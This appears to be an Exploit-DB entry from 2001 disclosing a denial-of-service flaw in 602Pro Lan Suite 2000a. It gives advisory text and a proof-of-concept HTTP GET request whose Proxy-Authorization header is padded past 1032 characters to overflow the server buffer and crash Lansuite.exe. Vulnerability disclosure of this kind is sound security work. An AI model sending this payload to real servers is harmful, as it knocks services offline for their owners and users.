602Pro Lan Suite 2000a - Long HTTP Request Denial of Service

EDB-ID:

20728

CVE:



Author:

nitr0s

Type:

dos


Platform:

Windows

Date:

2001-04-05


source: https://www.securityfocus.com/bid/2543/info

A denial of service vulnerability exists in versions of 602Pro Lan Suite.

A remote attacker may connect to port 80 of the vulnerable host. Via this connection, the attacker submits a long request composed of at least 1033 characters. This excess input causes an overflows of the server's input buffer and crashes Lansuite.exe and all applicable services. 

GET / HTTP/1.1
Proxy-Authorization:AAAAAAAAAAAAA.....

Where A x 1033 or more characters, as long as its
over 1032, it will work.